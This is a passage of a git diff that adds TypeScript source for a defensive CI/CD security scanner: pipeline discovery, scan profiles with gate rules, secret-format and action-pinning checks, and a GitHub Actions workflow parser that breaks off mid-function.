+      providers: targetProviders.map((p) => p.provider),
+    })
+
+    for (const provider of targetProviders) {
+      providerCounts[provider.provider] = 0
+
+      for (const pattern of provider.patterns) {
+        try {
+          const files = await glob(pattern, {
+            cwd: target,
+            absolute: true,
+            nodir: true,
+          })
+
+          for (const file of files) {
+            try {
+              const content = await fs.readFile(file, "utf-8")
+              const relativePath = path.relative(target, file)
+              const result = provider.parse(content, relativePath)
+
+              if (result.success && result.pipeline) {
+                pipelines.push(result.pipeline)
+                providerCounts[provider.provider]!++
+
+                await Bus.publish(CICDEvents.PipelineDiscovered, {
+                  target,
+                  provider: provider.provider,
+                  path: relativePath,
+                  name: result.pipeline.name,
+                })
+
+                log.debug("Discovered pipeline", {
+                  provider: provider.provider,
+                  path: relativePath,
+                  jobs: result.pipeline.jobs.length,
+                })
+              } else {
+                errors.push(...result.errors.map((e) => `${relativePath}: ${e}`))
+              }
+            } catch (err) {
+              const errMsg = `Failed to parse ${file}: ${(err as Error).message}`
+              log.warn(errMsg)
+              errors.push(errMsg)
+            }
+          }
+        } catch (err) {
+          const errMsg = `Glob error for ${pattern}: ${(err as Error).message}`
+          log.warn(errMsg)
+          errors.push(errMsg)
+        }
+      }
+    }
+
+    await Bus.publish(CICDEvents.DiscoveryCompleted, {
+      target,
+      pipelinesFound: pipelines.length,
+      providers: providerCounts as Record<string, number>,
+      duration: 0, // TODO: track duration
+    })
+
+    log.info("Pipeline discovery complete", {
+      pipelinesFound: pipelines.length,
+      providers: providerCounts,
+    })
+
+    return { pipelines, providers: providerCounts, errors }
+  }
+
+  /**
+   * Run a full CI/CD security scan
+   */
+  export async function scan(
+    target: string,
+    options: OrchestratorOptions = {}
+  ): Promise<CICDTypes.CICDScanResult> {
+    const startTime = Date.now()
+    const profileId = options.profile || "standard"
+    let profile = CICDProfiles.get(profileId) || CICDProfiles.Standard
+
+    // Apply custom overrides
+    if (options.customProfile) {
+      profile = CICDProfiles.createCustom(profileId, options.customProfile)
+    }
+
+    const scanId = CICDStorage.generateId.scan()
+
+    log.info("Starting CI/CD security scan", {
+      scanId,
+      target,
+      profile: profile.id,
+    })
+
+    // Initialize result
+    const result: CICDTypes.CICDScanResult = {
+      id: scanId,
+      target,
+      profile: profile.id,
+      status: "running",
+      pipelines: [],
+      findings: [],
+      sastResults: [],
+      stats: {
+        pipelinesDiscovered: 0,
+        pipelinesScanned: 0,
+        jobsAnalyzed: 0,
+        stepsAnalyzed: 0,
+        secretsChecked: 0,
+        permissionsChecked: 0,
+        actionsAnalyzed: 0,
+        findingsCount: 0,
+        criticalCount: 0,
+        highCount: 0,
+        mediumCount: 0,
+        lowCount: 0,
+        infoCount: 0,
+        suppressedCount: 0,
+        duration: 0,
+      },
+      startedAt: startTime,
+    }
+
+    try {
+      // Step 1: Discover pipelines
+      const discovery = await discover(target, options.providers)
+      result.pipelines = discovery.pipelines
+      result.stats.pipelinesDiscovered = discovery.pipelines.length
+
+      if (discovery.errors.length > 0) {
+        log.warn("Discovery had errors", { errors: discovery.errors })
+      }
+
+      // Emit scan started
+      await Bus.publish(CICDEvents.ScanStarted, {
+        scanID: scanId,
+        target,
+        profile: profile.id,
+        pipelineCount: result.pipelines.length,
+      })
+
+      // Step 2: Analyze each pipeline
+      for (const pipeline of result.pipelines) {
+        await Bus.publish(CICDEvents.PipelineAnalyzing, {
+          scanID: scanId,
+          provider: pipeline.provider,
+          path: pipeline.path,
+          name: pipeline.name,
+        })
+
+        // Run security checks based on profile
+        const checkResult = runChecks(pipeline, profile.checks, options.checkOptions)
+
+        // Add findings
+        result.findings.push(...checkResult.findings)
+
+        // Update stats
+        result.stats.pipelinesScanned++
+        result.stats.jobsAnalyzed += pipeline.jobs.length
+        result.stats.stepsAnalyzed += pipeline.jobs.reduce((acc, j) => acc + j.steps.length, 0)
+        result.stats.actionsAnalyzed += pipeline.actions.length
+        result.stats.permissionsChecked += pipeline.permissions.length
+        result.stats.secretsChecked += pipeline.secrets.length
+
+        await Bus.publish(CICDEvents.PipelineAnalyzed, {
+          scanID: scanId,
+          provider: pipeline.provider,
+          path: pipeline.path,
+          name: pipeline.name,
+          jobCount: pipeline.jobs.length,
+          stepCount: pipeline.jobs.reduce((acc, j) => acc + j.steps.length, 0),
+          findingsCount: checkResult.findings.length,
+        })
+
+        log.debug("Pipeline analyzed", {
+          pipeline: pipeline.name,
+          findings: checkResult.findings.length,
+        })
+      }
+
+      // Step 3: Run SAST if enabled
+      if (profile.sast.enabled && profile.sast.tools.length > 0) {
+        const sastResult = await SASTOrchestrator.run({
+          tools: profile.sast.tools,
+          target,
+          timeout: profile.sast.timeout,
+          scanId,
+          ...options.sastOptions,
+        })
+
+        result.sastResults = sastResult.results
+        result.findings.push(...sastResult.findings)
+      }
+
+      // Step 4: Count findings by severity
+      for (const finding of result.findings) {
+        if (finding.suppressed || finding.falsePositive) {
+          result.stats.suppressedCount++
+          continue
+        }
+
+        switch (finding.severity) {
+          case "critical":
+            result.stats.criticalCount++
+            break
+          case "high":
+            result.stats.highCount++
+            break
+          case "medium":
+            result.stats.mediumCount++
+            break
+          case "low":
+            result.stats.lowCount++
+            break
+          case "info":
+            result.stats.infoCount++
+            break
+        }
+      }
+
+      result.stats.findingsCount = result.findings.length
+
+      // Limit findings if configured
+      if (profile.maxFindings && result.findings.length > profile.maxFindings) {
+        log.warn("Findings exceeded max, truncating", {
+          found: result.findings.length,
+          max: profile.maxFindings,
+        })
+        result.findings = result.findings.slice(0, profile.maxFindings)
+      }
+
+      // Step 5: Evaluate security gate
+      if (profile.gate) {
+        const gateConfig = options.gateConfig || profile.gateConfig
+        result.gateResult = await SecurityGates.evaluate(result.findings, {
+          config: gateConfig,
+          scanId,
+        })
+      }
+
+      // Mark complete
+      result.status = "completed"
+      result.completedAt = Date.now()
+      result.stats.duration = result.completedAt - startTime
+
+      // Emit completion
+      await Bus.publish(CICDEvents.ScanCompleted, {
+        scanID: scanId,
+        target,
+        profile: profile.id,
+        pipelinesScanned: result.stats.pipelinesScanned,
+        findingsCount: result.stats.findingsCount,
+        criticalCount: result.stats.criticalCount,
+        highCount: result.stats.highCount,
+        gateStatus: result.gateResult?.status,
+        duration: result.stats.duration,
+        status: "completed",
+      })
+
+      log.info("CI/CD security scan complete", {
+        scanId,
+        pipelines: result.stats.pipelinesScanned,
+        findings: result.stats.findingsCount,
+        critical: result.stats.criticalCount,
+        high: result.stats.highCount,
+        gateStatus: result.gateResult?.status,
+        duration: result.stats.duration,
+      })
+    } catch (err) {
+      result.status = "failed"
+      result.error = (err as Error).message
+      result.completedAt = Date.now()
+      result.stats.duration = result.completedAt - startTime
+
+      await Bus.publish(CICDEvents.ScanFailed, {
+        scanID: scanId,
+        target,
+        error: result.error,
+      })
+
+      log.error("CI/CD scan failed", { scanId, error: result.error })
+    }
+
+    // Save result
+    await CICDStorage.saveScan(result, options.storageConfig)
+
+    return result
+  }
+
+  /**
+   * Get scan status by ID
+   */
+  export async function getStatus(
+    scanId: string,
+    storageConfig?: StorageConfig
+  ): Promise<CICDTypes.CICDScanResult | null> {
+    return CICDStorage.getScan(scanId, storageConfig)
+  }
+
+  /**
+   * List recent scans
+   */
+  export async function listScans(
+    storageConfig?: StorageConfig,
+    filters?: {
+      target?: string
+      profile?: CICDTypes.ProfileId
+      status?: CICDTypes.Status
+      limit?: number
+    }
+  ): Promise<CICDTypes.CICDScanResult[]> {
+    return CICDStorage.listScans(storageConfig, filters)
+  }
+
+  /**
+   * Quick scan with minimal checks
+   */
+  export async function quickScan(
+    target: string,
+    storageConfig?: StorageConfig
+  ): Promise<CICDTypes.CICDScanResult> {
+    return scan(target, {
+      profile: "quick",
+      storageConfig,
+    })
+  }
+
+  /**
+   * Standard scan with all checks
+   */
+  export async function standardScan(
+    target: string,
+    storageConfig?: StorageConfig
+  ): Promise<CICDTypes.CICDScanResult> {
+    return scan(target, {
+      profile: "standard",
+      storageConfig,
+    })
+  }
+
+  /**
+   * Thorough scan with SAST
+   */
+  export async function thoroughScan(
+    target: string,
+    storageConfig?: StorageConfig
+  ): Promise<CICDTypes.CICDScanResult> {
+    return scan(target, {
+      profile: "thorough",
+      storageConfig,
+    })
+  }
+
+  /**
+   * Format scan result for display
+   */
+  export function formatResult(result: CICDTypes.CICDScanResult): string {
+    const lines: string[] = []
+
+    lines.push(`CI/CD Security Scan: ${result.id}`)
+    lines.push(`Target: ${result.target}`)
+    lines.push(`Profile: ${result.profile}`)
+    lines.push(`Status: ${result.status}`)
+    lines.push("")
+
+    lines.push("Statistics:")
+    lines.push(`  Pipelines Discovered: ${result.stats.pipelinesDiscovered}`)
+    lines.push(`  Pipelines Scanned: ${result.stats.pipelinesScanned}`)
+    lines.push(`  Jobs Analyzed: ${result.stats.jobsAnalyzed}`)
+    lines.push(`  Steps Analyzed: ${result.stats.stepsAnalyzed}`)
+    lines.push(`  Actions Analyzed: ${result.stats.actionsAnalyzed}`)
+    lines.push("")
+
+    lines.push("Findings:")
+    lines.push(`  Total: ${result.stats.findingsCount}`)
+    lines.push(`  Critical: ${result.stats.criticalCount}`)
+    lines.push(`  High: ${result.stats.highCount}`)
+    lines.push(`  Medium: ${result.stats.mediumCount}`)
+    lines.push(`  Low: ${result.stats.lowCount}`)
+    lines.push(`  Info: ${result.stats.infoCount}`)
+    if (result.stats.suppressedCount > 0) {
+      lines.push(`  Suppressed: ${result.stats.suppressedCount}`)
+    }
+    lines.push("")
+
+    if (result.gateResult) {
+      lines.push("Security Gate:")
+      lines.push(`  Status: ${result.gateResult.status.toUpperCase()}`)
+      lines.push(`  ${result.gateResult.message}`)
+      lines.push("")
+    }
+
+    if (result.findings.length > 0) {
+      lines.push("Top Findings:")
+      const topFindings = result.findings
+        .filter((f) => !f.suppressed && !f.falsePositive)
+        .sort((a, b) => {
+          const severityOrder = { critical: 0, high: 1, medium: 2, low: 3, info: 4 }
+          return severityOrder[a.severity] - severityOrder[b.severity]
+        })
+        .slice(0, 10)
+
+      for (const finding of topFindings) {
+        lines.push(`  [${finding.severity.toUpperCase()}] ${finding.title}`)
+        lines.push(`    File: ${finding.file}${finding.line ? `:${finding.line}` : ""}`)
+      }
+    }
+
+    if (result.stats.duration) {
+      lines.push("")
+      lines.push(`Duration: ${(result.stats.duration / 1000).toFixed(1)}s`)
+    }
+
+    return lines.join("\n")
+  }
+}
diff --git a/packages/opencode/src/pentest/cicd/profiles.ts b/packages/opencode/src/pentest/cicd/profiles.ts
new file mode 100644
index 00000000000..cb122d8b921
--- /dev/null
+++ b/packages/opencode/src/pentest/cicd/profiles.ts
@@ -0,0 +1,282 @@
+/**
+ * @fileoverview CI/CD Security Scanner Profiles
+ *
+ * Predefined scan profiles for different use cases ranging from
+ * quick discovery to thorough compliance audits.
+ */
+
+import { CICDTypes } from "./types"
+
+export namespace CICDProfiles {
+  /** Discovery profile - enumerate pipelines only */
+  export const Discovery: CICDTypes.ScanProfile = {
+    id: "discovery",
+    name: "Discovery",
+    description: "Enumerate CI/CD pipelines without active testing",
+    checks: {
+      secrets: false,
+      permissions: false,
+      injection: false,
+      supplyChain: false,
+      misconfiguration: false,
+    },
+    sast: {
+      enabled: false,
+      tools: [],
+      timeout: 60000,
+      excludePaths: [],
+    },
+    gate: false,
+    timeout: 30000,
+    maxFindings: 100,
+  }
+
+  /** Quick profile - fast assessment of secrets and permissions */
+  export const Quick: CICDTypes.ScanProfile = {
+    id: "quick",
+    name: "Quick",
+    description: "Fast security assessment focusing on secrets and permissions",
+    checks: {
+      secrets: true,
+      permissions: true,
+      injection: false,
+      supplyChain: false,
+      misconfiguration: false,
+    },
+    sast: {
+      enabled: false,
+      tools: [],
+      timeout: 60000,
+      excludePaths: [],
+    },
+    gate: false,
+    timeout: 60000,
+    maxFindings: 500,
+  }
+
+  /** Standard profile - balanced scan with all checks */
+  export const Standard: CICDTypes.ScanProfile = {
+    id: "standard",
+    name: "Standard",
+    description: "Balanced CI/CD security assessment with all checks enabled",
+    checks: {
+      secrets: true,
+      permissions: true,
+      injection: true,
+      supplyChain: true,
+      misconfiguration: true,
+    },
+    sast: {
+      enabled: false,
+      tools: [],
+      timeout: 120000,
+      excludePaths: [],
+    },
+    gate: true,
+    gateConfig: {
+      enabled: true,
+      blockOnCritical: true,
+      blockOnHigh: false,
+      maxCritical: 0,
+      maxHigh: 5,
+      maxMedium: 20,
+      maxLow: 100,
+      rules: [
+        { id: "no-secrets", category: "secrets", action: "fail", description: "Block on any hardcoded secrets" },
+        { id: "no-injection", category: "injection", action: "fail", description: "Block on command injection risks" },
+        { id: "pin-actions", category: "supply-chain", action: "warn", description: "Warn on unpinned actions" },
+      ],
+    },
+    timeout: 120000,
+    maxFindings: 1000,
+  }
+
+  /** Thorough profile - comprehensive audit with SAST */
+  export const Thorough: CICDTypes.ScanProfile = {
+    id: "thorough",
+    name: "Thorough",
+    description: "Comprehensive CI/CD security audit with SAST integration",
+    checks: {
+      secrets: true,
+      permissions: true,
+      injection: true,
+      supplyChain: true,
+      misconfiguration: true,
+    },
+    sast: {
+      enabled: true,
+      tools: ["semgrep", "gitleaks"],
+      timeout: 300000,
+      excludePaths: ["node_modules", "vendor", ".git", "dist", "build"],
+    },
+    gate: true,
+    gateConfig: {
+      enabled: true,
+      blockOnCritical: true,
+      blockOnHigh: true,
+      maxCritical: 0,
+      maxHigh: 0,
+      maxMedium: 10,
+      maxLow: 50,
+      rules: [
+        { id: "no-secrets", category: "secrets", action: "fail", description: "Block on any hardcoded secrets" },
+        { id: "no-injection", category: "injection", action: "fail", description: "Block on command injection risks" },
+        { id: "pin-actions", category: "supply-chain", action: "fail", description: "Block on unpinned actions" },
+        { id: "least-privilege", category: "permissions", action: "warn", description: "Warn on excessive permissions" },
+      ],
+    },
+    timeout: 600000,
+    maxFindings: 2000,
+  }
+
+  /** Compliance profile - regulatory compliance focused */
+  export const Compliance: CICDTypes.ScanProfile = {
+    id: "compliance",
+    name: "Compliance",
+    description: "Regulatory compliance-focused CI/CD security assessment",
+    checks: {
+      secrets: true,
+      permissions: true,
+      injection: true,
+      supplyChain: true,
+      misconfiguration: true,
+    },
+    sast: {
+      enabled: false,
+      tools: [],
+      timeout: 120000,
+      excludePaths: [],
+    },
+    gate: true,
+    gateConfig: {
+      enabled: true,
+      blockOnCritical: true,
+      blockOnHigh: true,
+      maxCritical: 0,
+      maxHigh: 0,
+      maxMedium: 5,
+      maxLow: 25,
+      rules: [
+        { id: "no-secrets", category: "secrets", action: "fail", description: "Block on any hardcoded secrets" },
+        { id: "no-injection", category: "injection", action: "fail", description: "Block on command injection risks" },
+        { id: "pin-actions", category: "supply-chain", action: "fail", description: "Block on unpinned actions" },
+        { id: "least-privilege", category: "permissions", action: "fail", description: "Block on excessive permissions" },
+        { id: "secure-runners", category: "runner", action: "fail", description: "Block on insecure runner configs" },
+      ],
+    },
+    timeout: 300000,
+    maxFindings: 1000,
+  }
+
+  /** All profiles indexed by ID */
+  export const All: Record<CICDTypes.ProfileId, CICDTypes.ScanProfile> = {
+    discovery: Discovery,
+    quick: Quick,
+    standard: Standard,
+    thorough: Thorough,
+    compliance: Compliance,
+  }
+
+  /** Get a profile by ID */
+  export function get(id: CICDTypes.ProfileId): CICDTypes.ScanProfile | undefined {
+    return All[id]
+  }
+
+  /** List all available profiles */
+  export function list(): CICDTypes.ScanProfile[] {
+    return Object.values(All)
+  }
+
+  /** Create a custom profile with overrides */
+  export function createCustom(
+    baseId: CICDTypes.ProfileId,
+    overrides: Partial<Omit<CICDTypes.ScanProfile, "id">>
+  ): CICDTypes.ScanProfile {
+    const baseProfile = get(baseId) || Standard
+    return {
+      ...baseProfile,
+      ...overrides,
+      id: baseId, // Keep original ID for tracking
+      checks: {
+        ...baseProfile.checks,
+        ...overrides.checks,
+      },
+      sast: {
+        ...baseProfile.sast,
+        ...overrides.sast,
+      },
+      gateConfig: overrides.gateConfig
+        ? { ...baseProfile.gateConfig, ...overrides.gateConfig }
+        : baseProfile.gateConfig,
+    }
+  }
+
+  /** Format a single profile for display */
+  export function format(profile: CICDTypes.ScanProfile): string {
+    const lines: string[] = []
+    lines.push(`Profile: ${profile.name} (${profile.id})`)
+    lines.push(`  ${profile.description}`)
+    lines.push("")
+    lines.push("Checks:")
+    lines.push(`  Secrets:          ${profile.checks.secrets ? "✓" : "✗"}`)
+    lines.push(`  Permissions:      ${profile.checks.permissions ? "✓" : "✗"}`)
+    lines.push(`  Injection:        ${profile.checks.injection ? "✓" : "✗"}`)
+    lines.push(`  Supply Chain:     ${profile.checks.supplyChain ? "✓" : "✗"}`)
+    lines.push(`  Misconfiguration: ${profile.checks.misconfiguration ? "✓" : "✗"}`)
+    lines.push("")
+    lines.push(`SAST: ${profile.sast.enabled ? `Enabled (${profile.sast.tools.join(", ")})` : "Disabled"}`)
+    lines.push(`Gate: ${profile.gate ? "Enabled" : "Disabled"}`)
+    lines.push(`Timeout: ${profile.timeout / 1000}s`)
+
+    return lines.join("\n")
+  }
+
+  /** Format all profiles as a table */
+  export function formatTable(): string {
+    const lines: string[] = []
+    lines.push("CI/CD Scan Profiles")
+    lines.push("=".repeat(80))
+    lines.push("")
+    lines.push(
+      "| Profile     | Secrets | Perms | Inject | Supply | SAST | Gate | Description"
+    )
+    lines.push(
+      "|-------------|---------|-------|--------|--------|------|------|" + "-".repeat(30)
+    )
+
+    for (const profile of list()) {
+      const row = [
+        profile.id.padEnd(11),
+        profile.checks.secrets ? "  ✓  " : "  ✗  ",
+        profile.checks.permissions ? "  ✓  " : "  ✗  ",
+        profile.checks.injection ? "  ✓  " : "  ✗  ",
+        profile.checks.supplyChain ? "  ✓  " : "  ✗  ",
+        profile.sast.enabled ? " ✓  " : " ✗  ",
+        profile.gate ? " ✓  " : " ✗  ",
+        profile.description.slice(0, 30),
+      ]
+      lines.push(`| ${row.join(" | ")}`)
+    }
+
+    lines.push("")
+    lines.push("Use 'cicd scan profile=<name>' to run with a specific profile")
+
+    return lines.join("\n")
+  }
+
+  /** Default gate configuration */
+  export const DefaultGateConfig: CICDTypes.GateConfig = {
+    enabled: true,
+    blockOnCritical: true,
+    blockOnHigh: false,
+    maxCritical: 0,
+    maxHigh: 5,
+    maxMedium: 20,
+    maxLow: 100,
+    rules: [
+      { id: "no-secrets", category: "secrets", action: "fail", description: "Block on hardcoded secrets" },
+      { id: "no-injection", category: "injection", action: "fail", description: "Block on injection risks" },
+      { id: "pin-actions", category: "supply-chain", action: "warn", description: "Warn on unpinned actions" },
+    ],
+  }
+}
diff --git a/packages/opencode/src/pentest/cicd/providers/base.ts b/packages/opencode/src/pentest/cicd/providers/base.ts
new file mode 100644
index 00000000000..647f1e7feee
--- /dev/null
+++ b/packages/opencode/src/pentest/cicd/providers/base.ts
@@ -0,0 +1,211 @@
+/**
+ * @fileoverview CI/CD Provider Base Interface
+ *
+ * Base interface and utilities for CI/CD pipeline configuration parsers.
+ */
+
+import { CICDTypes } from "../types"
+
+/** Parser result with potential errors */
+export interface ParseResult {
+  success: boolean
+  pipeline?: CICDTypes.PipelineConfig
+  errors: string[]
+  warnings: string[]
+}
+
+/** Provider discovery result */
+export interface DiscoveryResult {
+  provider: CICDTypes.Provider
+  files: string[]
+}
+
+/** Provider interface */
+export interface CICDProvider {
+  /** Provider identifier */
+  readonly provider: CICDTypes.Provider
+
+  /** File patterns to discover configs */
+  readonly patterns: string[]
+
+  /** Parse a configuration file */
+  parse(content: string, filePath: string): ParseResult
+
+  /** Validate the parsed configuration */
+  validate(pipeline: CICDTypes.PipelineConfig): string[]
+
+  /** Extract actions/dependencies from the pipeline */
+  extractActions(pipeline: CICDTypes.PipelineConfig): CICDTypes.ActionReference[]
+
+  /** Extract secrets referenced in the pipeline */
+  extractSecrets(pipeline: CICDTypes.PipelineConfig): CICDTypes.SecretReference[]
+
+  /** Extract permissions from the pipeline */
+  extractPermissions(pipeline: CICDTypes.PipelineConfig): CICDTypes.Permission[]
+}
+
+/** Base utilities shared across providers */
+export namespace ProviderUtils {
+  /** Generate unique IDs for parsed elements */
+  export function generateId(prefix: string): string {
+    return `${prefix}_${Date.now().toString(36)}_${Math.random().toString(36).slice(2, 8)}`
+  }
+
+  /** Normalize a step name */
+  export function normalizeStepName(name: string | undefined, index: number): string {
+    if (name && name.trim()) {
+      return name.trim()
+    }
+    return `step-${index + 1}`
+  }
+
+  /** Normalize a job name */
+  export function normalizeJobName(name: string | undefined, id: string): string {
+    if (name && name.trim()) {
+      return name.trim()
+    }
+    return id
+  }
+
+  /** Parse environment variables from various formats */
+  export function parseEnvVars(
+    env: unknown
+  ): Record<string, string> {
+    if (!env) return {}
+
+    if (typeof env === "object" && env !== null && !Array.isArray(env)) {
+      const result: Record<string, string> = {}
+      for (const [key, value] of Object.entries(env)) {
+        result[key] = String(value)
+      }
+      return result
+    }
+
+    return {}
+  }
+
+  /** Extract secret references from environment variables */
+  export function extractSecretsFromEnv(
+    env: Record<string, string>,
+    location: string
+  ): CICDTypes.SecretReference[] {
+    const secrets: CICDTypes.SecretReference[] = []
+
+    for (const [name, value] of Object.entries(env)) {
+      // Check for GitHub-style secret references: ${{ secrets.NAME }}
+      const githubMatch = value.match(/\$\{\{\s*secrets\.(\w+)\s*\}\}/g)
+      if (githubMatch) {
+        for (const match of githubMatch) {
+          const secretName = match.match(/secrets\.(\w+)/)?.[1]
+          if (secretName) {
+            secrets.push({
+              name: secretName,
+              source: "env",
+              location,
+              exposed: false,
+            })
+          }
+        }
+      }
+
+      // Check for GitLab-style secret references: $SECRET_NAME or ${SECRET_NAME}
+      const gitlabMatch = value.match(/\$\{?([A-Z_][A-Z0-9_]*)\}?/g)
+      if (gitlabMatch) {
+        for (const match of gitlabMatch) {
+          // Skip if it looks like a GitHub expression
+          if (match.includes("{{")) continue
+          const secretName = match.replace(/[${}]/g, "")
+          if (secretName && /^[A-Z_][A-Z0-9_]*$/.test(secretName)) {
+            secrets.push({
+              name: secretName,
+              source: "variable",
+              location,
+              exposed: false,
+            })
+          }
+        }
+      }
+    }
+
+    return secrets
+  }
+
+  /** Check if a string looks like it contains a secret */
+  export function looksLikeSecret(value: string): boolean {
+    // Common secret patterns
+    const patterns = [
+      /^(ghp|gho|ghu|ghs|ghr)_[A-Za-z0-9_]{36,255}$/,  // GitHub tokens
+      /^github_pat_[A-Za-z0-9_]{22,}/,  // GitHub fine-grained tokens
+      /^AKIA[0-9A-Z]{16}$/,  // AWS access key
+      /^xox[baprs]-[0-9A-Za-z-]{10,}$/,  // Slack tokens
+      /^npm_[A-Za-z0-9]{36}$/,  // NPM tokens
+      /^sk-[A-Za-z0-9]{48}$/,  // OpenAI API keys
+      /^-----BEGIN.*PRIVATE KEY-----/,  // Private keys
+    ]
+
+    return patterns.some((p) => p.test(value))
+  }
+
+  /** Extract a line number from content for a given substring */
+  export function getLineNumber(content: string, substring: string): number {
+    const index = content.indexOf(substring)
+    if (index === -1) return 1
+
+    const lines = content.slice(0, index).split("\n")
+    return lines.length
+  }
+
+  /** Check if an action is from a trusted source */
+  export function isTrustedAction(action: string): boolean {
+    return CICDTypes.TRUSTED_ACTION_PREFIXES.some((prefix) =>
+      action.toLowerCase().startsWith(prefix.toLowerCase())
+    )
+  }
+
+  /** Check if an action is pinned to a SHA */
+  export function isPinnedAction(version: string | undefined): boolean {
+    if (!version) return false
+    // SHA-1 or SHA-256 hashes
+    return /^[a-f0-9]{40}$/.test(version) || /^[a-f0-9]{64}$/.test(version)
+  }
+
+  /** Parse action reference from string (e.g., "actions/checkout@v4") */
+  export function parseActionReference(
+    actionStr: string,
+    file: string,
+    line: number
+  ): CICDTypes.ActionReference {
+    const [fullName, version] = actionStr.split("@")
+    const sha = isPinnedAction(version) ? version : undefined
+
+    return {
+      name: fullName,
+      version: sha ? undefined : version,
+      sha,
+      pinned: !!sha,
+      trusted: isTrustedAction(fullName),
+      file,
+      line,
+      official: fullName.startsWith("actions/") || fullName.startsWith("github/"),
+    }
+  }
+
+  /** Calculate entropy of a string (for secret detection) */
+  export function calculateEntropy(str: string): number {
+    const len = str.length
+    if (len === 0) return 0
+
+    const freq: Record<string, number> = {}
+    for (const char of str) {
+      freq[char] = (freq[char] || 0) + 1
+    }
+
+    let entropy = 0
+    for (const count of Object.values(freq)) {
+      const p = count / len
+      entropy -= p * Math.log2(p)
+    }
+
+    return entropy
+  }
+}
diff --git a/packages/opencode/src/pentest/cicd/providers/github.ts b/packages/opencode/src/pentest/cicd/providers/github.ts
new file mode 100644
index 00000000000..094adba993b
--- /dev/null
+++ b/packages/opencode/src/pentest/cicd/providers/github.ts
@@ -0,0 +1,416 @@
+/**
+ * @fileoverview GitHub Actions Provider
+ *
+ * Parser and analyzer for GitHub Actions workflow files.
+ */
+
+import * as yaml from "yaml"
+import { CICDTypes } from "../types"
+import { ProviderUtils } from "./base"
+import type { CICDProvider, ParseResult } from "./base"
+
+/** GitHub Actions workflow structure */
+interface GitHubWorkflow {
+  name?: string
+  on?: unknown
+  env?: Record<string, string>
+  permissions?: Record<string, string> | string
+  jobs?: Record<string, GitHubJob>
+}
+
+interface GitHubJob {
+  name?: string
+  "runs-on"?: string | string[]
+  container?: string | { image: string }
+  permissions?: Record<string, string>
+  env?: Record<string, string>
+  needs?: string | string[]
+  if?: string
+  steps?: GitHubStep[]
+}
+
+interface GitHubStep {
+  name?: string
+  id?: string
+  uses?: string
+  run?: string
+  shell?: string
+  env?: Record<string, string>
+  with?: Record<string, unknown>
+  if?: string
+}
+
+export class GitHubActionsProvider implements CICDProvider {
+  readonly provider: CICDTypes.Provider = "github"
+  readonly patterns = [".github/workflows/*.yml", ".github/workflows/*.yaml"]
+
+  parse(content: string, filePath: string): ParseResult {
+    const errors: string[] = []
+    const warnings: string[] = []
+
+    try {
+      const workflow = yaml.parse(content) as GitHubWorkflow
+
+      if (!workflow || typeof workflow !== "object") {
+        return { success: false, errors: ["Invalid YAML: not an object"], warnings }
+      }
+
+      const pipeline: CICDTypes.PipelineConfig = {
+        id: ProviderUtils.generateId("gh"),
+        provider: "github",
+        name: workflow.name || filePath.split("/").pop() || "unnamed",
+        path: filePath,
+        raw: content,
+        triggers: this.parseTriggers(workflow.on),
+        jobs: [],
+        secrets: [],
+        permissions: this.parsePermissions(workflow.permissions, filePath),
+        env: ProviderUtils.parseEnvVars(workflow.env),
+        actions: [],
+        parsedAt: Date.now(),
+        parseErrors: [],
+      }
+
+      // Parse jobs
+      if (workflow.jobs) {
+        for (const [jobId, job] of Object.entries(workflow.jobs)) {
+          const parsedJob = this.parseJob(jobId, job, content, filePath)
+          pipeline.jobs.push(parsedJob)
+
+          // Collect actions from steps
+          for (const step of parsedJob.steps) {
+            if (step.action) {
+              const actionRef = ProviderUtils.parseActionReference(
+                step.action,
+                filePath,
+                step.line || 1
+              )
+              pipeline.actions.push(actionRef)
+            }
+          }
+
+          // Collect secrets from job env
+          pipeline.secrets.push(
+            ...ProviderUtils.extractSecretsFromEnv(parsedJob.env, `${filePath}:${jobId}`)
+          )
+        }
+      }
+
+      // Collect secrets from workflow env
+      pipeline.secrets.push(
+        ...ProviderUtils.extractSecretsFromEnv(pipeline.env, filePath)
+      )
+
+      // Deduplicate secrets
+      const secretMap = new Map<string, CICDTypes.SecretReference>()
+      for (const secret of pipeline.secrets) {
+        secretMap.set(secret.name, secret)
+      }
+      pipeline.secrets = Array.from(secretMap.values())
+
+      return { success: true, pipeline, errors, warnings }
+    } catch (err) {
+      errors.push(`YAML parse error: ${(err as Error).message}`)
+      return { success: false, errors, warnings }
+    }
+  }
+
+  private parseTriggers(on: unknown): CICDTypes.PipelineTrigger[] {
+    const triggers: CICDTypes.PipelineTrigger[] = []
+
+    if (!on) return triggers
+
+    // Simple string form: "on: push"
+    if (typeof on === "string") {
+      triggers.push({
+        type: this.mapTriggerType(on),
+        branches: [],
+        paths: [],
+        config: {},
+      })
+      return triggers
+    }
+
+    // Array form: "on: [push, pull_request]"
+    if (Array.isArray(on)) {
+      for (const event of on) {
+        if (typeof event === "string") {
+          triggers.push({
+            type: this.mapTriggerType(event),
+            branches: [],
+            paths: [],
+            config: {},
+          })
+        }
+      }
+      return triggers
+    }
+
+    // Object form with configuration
+    if (typeof on === "object" && on !== null) {
+      for (const [event, config] of Object.entries(on)) {
+        const trigger: CICDTypes.PipelineTrigger = {
+          type: this.mapTriggerType(event),
+          branches: [],
+          paths: [],
+          config: {},
+        }
+
+        if (config && typeof config === "object" && !Array.isArray(config)) {
+          const cfg = config as Record<string, unknown>
+          if (Array.isArray(cfg.branches)) {
+            trigger.branches = cfg.branches.map(String)
+          }
+          if (Array.isArray(cfg.paths)) {
+            trigger.paths = cfg.paths.map(String)
+          }
+          if (Array.isArray(cfg["branches-ignore"])) {
+            trigger.config["branches-ignore"] = cfg["branches-ignore"]
+          }
+          if (Array.isArray(cfg["paths-ignore"])) {
+            trigger.config["paths-ignore"] = cfg["paths-ignore"]
+          }
+          if (Array.isArray(cfg.types)) {
+            trigger.config.types = cfg.types
+          }
+        }
+
+        triggers.push(trigger)
+      }
+    }
+
+    return triggers
+  }
+
+  private mapTriggerType(event: string): CICDTypes.PipelineTrigger["type"] {
+    const mapping: Record<string, CICDTypes.PipelineTrigger["type"]> = {
+      push: "push",
+      pull_request: "pull_request",
+      pull_request_target: "pull_request",
+      schedule: "schedule",
+      workflow_dispatch: "workflow_dispatch",
+      workflow_call: "workflow_call",
+      release: "release",
+      workflow_run: "workflow_dispatch",
+    }
+    return mapping[event] || "manual"
+  }
+
+  private parsePermissions(
+    permissions: Record<string, string> | string | undefined,
+    filePath: string
+  ): CICDTypes.Permission[] {
+    const result: CICDTypes.Permission[] = []
+
+    if (!permissions) return result
+
+    if (typeof permissions === "string") {
+      // "permissions: read-all" or "permissions: write-all"
+      result.push({
+        resource: "all",
